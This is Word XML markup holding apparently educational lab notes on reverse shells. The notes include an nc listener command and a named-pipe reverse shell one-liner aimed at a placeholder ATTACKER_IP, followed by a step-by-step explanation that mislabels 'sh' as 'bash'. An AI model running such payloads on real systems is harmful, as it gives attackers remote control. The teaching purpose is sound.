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AA0D0" w14:textId="2E6A177F" w:rsidR="006E06E9" w:rsidRDefault="00CD5232" w:rsidP="00CD5232">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD5232">
        <w:t>Room Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370BFE1B" w14:textId="36C16EA0" w:rsidR="002C43DF" w:rsidRPr="002C43DF" w:rsidRDefault="00B13573" w:rsidP="002C43DF">
      <w:r w:rsidRPr="00B13573">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79FAFE2A" wp14:editId="59AA2B53">
            <wp:extent cx="5731510" cy="3751580"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="63084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47139" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3751580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="622035E9" w14:textId="77777777" w:rsidR="002C43DF" w:rsidRPr="002C43DF" w:rsidRDefault="002C43DF" w:rsidP="002C43DF">
      <w:r w:rsidRPr="002C43DF">
        <w:t>Shells in cyber security are widely used by attackers to remotely control systems, making them an important part of the attack chain. In this room, we'll explore different shells used in offensive security, the differences between them, and their use cases. This knowledge can help enhance penetration testing and exploitation skills and also help us understand how to detect when a remote shell is being used by an attacker within an organization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BB00D0" w14:textId="77777777" w:rsidR="00447A13" w:rsidRPr="00447A13" w:rsidRDefault="00447A13" w:rsidP="006D3416">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00447A13">
        <w:t>Caveats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711AD4FF" w14:textId="77777777" w:rsidR="00447A13" w:rsidRDefault="00447A13" w:rsidP="00447A13">
      <w:r w:rsidRPr="00447A13">
        <w:t>The use of Metasploit or other Frameworks that generate or interact with shells has been intentionally left behind from this room. This is to focus on understanding how shells work without the use or assistance of a tool to either set up or generate a shell. Also, for this room, we'll use Linux OS for all the examples.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D28F37" w14:textId="4B9847D9" w:rsidR="001114C6" w:rsidRDefault="001114C6" w:rsidP="001114C6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="001114C6">
        <w:t>Shell Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C00D69" w14:textId="77777777" w:rsidR="000E6CFB" w:rsidRPr="000E6CFB" w:rsidRDefault="000E6CFB" w:rsidP="000E6CFB">
      <w:r w:rsidRPr="000E6CFB">
        <w:t>What is a Shell?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CF3DC0" w14:textId="77777777" w:rsidR="000E6CFB" w:rsidRPr="000E6CFB" w:rsidRDefault="000E6CFB" w:rsidP="000E6CFB">
      <w:r w:rsidRPr="000E6CFB">
        <w:t>A shell is software that allows a user to interact with an OS. It can be a graphical interface, but it is usually a command-line interface, and this will depend on the operating system running on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1980C8F7" w14:textId="77777777" w:rsidR="000E6CFB" w:rsidRPr="000E6CFB" w:rsidRDefault="000E6CFB" w:rsidP="000E6CFB">
      <w:r w:rsidRPr="000E6CFB">
        <w:t>In cyber security, it commonly refers to a specific shell session an attacker uses when accessing a compromised system, allowing them to run commands and execute software. This will allow attackers to execute several activities, some of which are described below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAA79E1" w14:textId="77777777" w:rsidR="000E6CFB" w:rsidRPr="000E6CFB" w:rsidRDefault="000E6CFB" w:rsidP="000E6CFB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E6CFB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Remote System Control</w:t>
      </w:r>
      <w:r w:rsidRPr="000E6CFB">
        <w:t>: allows the attacker to execute commands or software remotely in the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331297E3" w14:textId="77777777" w:rsidR="000E6CFB" w:rsidRPr="000E6CFB" w:rsidRDefault="000E6CFB" w:rsidP="000E6CFB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E6CFB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Privilege Escalation</w:t>
      </w:r>
      <w:r w:rsidRPr="000E6CFB">
        <w:t>: If initial access through a shell is limited or restricted, attackers can explore ways to escalate privileges to more elevated or administrative access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B59AFB6" w14:textId="77777777" w:rsidR="000E6CFB" w:rsidRPr="000E6CFB" w:rsidRDefault="000E6CFB" w:rsidP="000E6CFB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E6CFB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Data Exfiltration</w:t>
      </w:r>
      <w:r w:rsidRPr="000E6CFB">
        <w:t>: Once attackers have access to execute commands through an obtained shell, they can explore the system to read and copy sensitive data from it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB6C78F" w14:textId="77777777" w:rsidR="000E6CFB" w:rsidRPr="000E6CFB" w:rsidRDefault="000E6CFB" w:rsidP="000E6CFB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E6CFB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Persistence and Maintenance Access</w:t>
      </w:r>
      <w:r w:rsidRPr="000E6CFB">
        <w:t>: Once shell access is obtained, attackers can create access through users and credentials or copy backdoor software to maintain access to the target system for later usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0112AF44" w14:textId="77777777" w:rsidR="000E6CFB" w:rsidRPr="000E6CFB" w:rsidRDefault="000E6CFB" w:rsidP="000E6CFB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E6CFB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Post-Exploitation Activities</w:t>
      </w:r>
      <w:r w:rsidRPr="000E6CFB">
        <w:t>: After access to a shell is granted, attackers can perform a wide range of post-exploitation activities, such as deploying malware, creating hidden accounts, and deleting information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DA6FE9" w14:textId="77777777" w:rsidR="000E6CFB" w:rsidRPr="000E6CFB" w:rsidRDefault="000E6CFB" w:rsidP="000E6CFB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E6CFB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Access Other Systems on the Network</w:t>
      </w:r>
      <w:r w:rsidRPr="000E6CFB">
        <w:t>: Depending on the attacker's intentions, the obtained shell can be just an initial access point. The goal can be to hop through the network to a different target using the obtained shell as a pivot to different points in the compromised system network. This is also known as pivoting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B041DEF" w14:textId="77777777" w:rsidR="000E6CFB" w:rsidRPr="000E6CFB" w:rsidRDefault="000E6CFB" w:rsidP="000E6CFB">
      <w:r w:rsidRPr="000E6CFB">
        <w:t>All of the shells we will describe in the next tasks can help to achieve different limitations of the attacks described above.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8407DE" w14:textId="552CA945" w:rsidR="001114C6" w:rsidRDefault="007C3B8A" w:rsidP="007C3B8A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="007C3B8A">
        <w:t>Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5505B047" w14:textId="77777777" w:rsidR="00CB4AF9" w:rsidRPr="00CB4AF9" w:rsidRDefault="00CB4AF9" w:rsidP="00CB4AF9">
      <w:r w:rsidRPr="00CB4AF9">
        <w:t>A reverse shell, sometimes referred to as a "connect back shell," is one of the most popular techniques for gaining access to a system in cyberattacks. The connections initiate from the target system to the attacker's machine, which can help avoid detection from network firewalls and other security appliances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56486D68" w14:textId="77777777" w:rsidR="00CB4AF9" w:rsidRPr="00CB4AF9" w:rsidRDefault="00CB4AF9" w:rsidP="00CB4AF9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00CB4AF9">
        <w:t>How Reverse Shells Work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339A11EA" w14:textId="77777777" w:rsidR="00CB4AF9" w:rsidRPr="00CB4AF9" w:rsidRDefault="00CB4AF9" w:rsidP="00CB4AF9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00CB4AF9">
        <w:t xml:space="preserve">Set up a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB4AF9">
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB4AF9">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB4AF9">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB4AF9">
        <w:t>) Listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38ADFD66" w14:textId="77777777" w:rsidR="00CB4AF9" w:rsidRPr="00CB4AF9" w:rsidRDefault="00CB4AF9" w:rsidP="00CB4AF9">
      <w:r w:rsidRPr="00CB4AF9">
        <w:t xml:space="preserve">Let's now understand how a reverse shell works in a practical scenario using the tool </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB4AF9">
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB4AF9">
        <w:t>. This utility supports multiple OSs and allows reading and writing through a network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DEFF29" w14:textId="5C5932D9" w:rsidR="00CB4AF9" w:rsidRDefault="00CB4AF9" w:rsidP="00CB4AF9">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB4AF9">
        <w:t xml:space="preserve">As mentioned above, a reverse shell will connect back to the attacker's machine. This machine will be waiting for a connection, so let's use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB4AF9">
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB4AF9">
        <w:t xml:space="preserve"> to listen to a connection using the following command </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB4AF9">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB4AF9">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB4AF9">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB4AF9">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> 443</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB4AF9">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00FE444D" w:rsidRPr="00FE444D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FE444D" w:rsidRPr="00FE444D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73FDB7A0" wp14:editId="70040D8A">
            <wp:extent cx="5731510" cy="749300"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="173300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00401" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="749300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0C2C0B" w14:textId="77777777" w:rsidR="00FE444D" w:rsidRPr="00FE444D" w:rsidRDefault="00FE444D" w:rsidP="00FE444D">
      <w:r w:rsidRPr="00FE444D">
        <w:t>The command above uses the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-l</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE444D">
        <w:t xml:space="preserve"> option to indicate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE444D">
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE444D">
        <w:t xml:space="preserve"> to listen or wait for a connection. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-v</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE444D">
        <w:t> option enables verbose mode. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-n</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE444D">
        <w:t> option prevents the connections from using DNS for lookup, so it will not resolve any hostname it will use an IP address. Finally, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-p</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE444D">
        <w:t> flag indicates the port that will be used to wait for the connection, in the case above, port </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>443</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE444D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00027E3D" w14:textId="77777777" w:rsidR="00FE444D" w:rsidRPr="00FE444D" w:rsidRDefault="00FE444D" w:rsidP="00FE444D">
      <w:r w:rsidRPr="00FE444D">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Any port can be used to wait for a connection, but attackers and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE444D">
        <w:t>pentesters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE444D">
        <w:t xml:space="preserve"> tend to use known ports used by other applications like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>53</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE444D">
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE444D">
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8080</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE444D">
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>443</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE444D">
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>139</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE444D">
        <w:t>, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>445</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE444D">
        <w:t>. This is to blend the reverse shell with legitimate traffic and avoid detection by security appliances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB18E46" w14:textId="77777777" w:rsidR="00FE444D" w:rsidRPr="00FE444D" w:rsidRDefault="00FE444D" w:rsidP="00FE444D">
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Gaining Reverse Shell Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AC0267" w14:textId="77777777" w:rsidR="00FE444D" w:rsidRPr="00FE444D" w:rsidRDefault="00FE444D" w:rsidP="00FE444D">
      <w:r w:rsidRPr="00FE444D">
        <w:t>Once we have our listener set, the attacker should execute what is known as a reverse shell payload. This payload usually abuses the vulnerability or unauthorized access granted by the attacker and executes a command that will expose the shell through the network. There's a variety of payloads that will depend on the tools and OS of the compromised system. We can explore some of them </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00FE444D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00FE444D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E4EB21" w14:textId="77777777" w:rsidR="00FE444D" w:rsidRPr="00FE444D" w:rsidRDefault="00FE444D" w:rsidP="00FE444D">
      <w:r w:rsidRPr="00FE444D">
        <w:t xml:space="preserve">As an example, let's </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE444D">
        <w:t>analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE444D">
        <w:t xml:space="preserve"> an example payload named a</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> pipe reverse shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE444D">
        <w:t>, as shown below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1D364A" w14:textId="77777777" w:rsidR="00FE444D" w:rsidRPr="00FE444D" w:rsidRDefault="00FE444D" w:rsidP="00FE444D">
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>rm -f /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">/f; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>mkfifo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/f; cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">/f | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2&gt;&amp;1 | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> ATTACKER_IP ATTACKER_PORT &gt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B8A4E6" w14:textId="77777777" w:rsidR="00FE444D" w:rsidRPr="00FE444D" w:rsidRDefault="00FE444D" w:rsidP="00FE444D">
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explanation of the Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539AFAAC" w14:textId="77777777" w:rsidR="00FE444D" w:rsidRPr="00FE444D" w:rsidRDefault="00FE444D" w:rsidP="00FE444D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>rm -f /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/f</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE444D">
        <w:t> - This command removes any existing named pipe file located at /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE444D">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE444D">
        <w:t>/f/. This ensures that the script can create a new named pipe without conflicts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8F80B5" w14:textId="77777777" w:rsidR="00FE444D" w:rsidRPr="00FE444D" w:rsidRDefault="00FE444D" w:rsidP="00FE444D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>mkfifo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/f</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE444D">
        <w:t> - This command creates a named pipe, or FIFO (first-in, first-out), at /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE444D">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE444D">
        <w:t>/f. Named pipes allow for two-way communication between processes. In this context, it acts as a conduit for input and output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4992FE" w14:textId="77777777" w:rsidR="00FE444D" w:rsidRPr="00FE444D" w:rsidRDefault="00FE444D" w:rsidP="00FE444D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/f</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE444D">
        <w:t> - This command reads data from the named pipe. It waits for input that can be sent through the pipe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60990233" w14:textId="77777777" w:rsidR="00FE444D" w:rsidRPr="00FE444D" w:rsidRDefault="00FE444D" w:rsidP="00FE444D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>| bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2&gt;&amp;1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE444D">
        <w:t> - The output of cat is piped to a shell instance (bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE444D">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE444D">
        <w:t>), which allows the attacker to execute commands interactively. The 2&gt;&amp;1 redirects standard error to standard output, ensuring that error messages are sent back to the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F635E4" w14:textId="77777777" w:rsidR="00FE444D" w:rsidRPr="00FE444D" w:rsidRDefault="00FE444D" w:rsidP="00FE444D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE444D">
        <w:rPr>
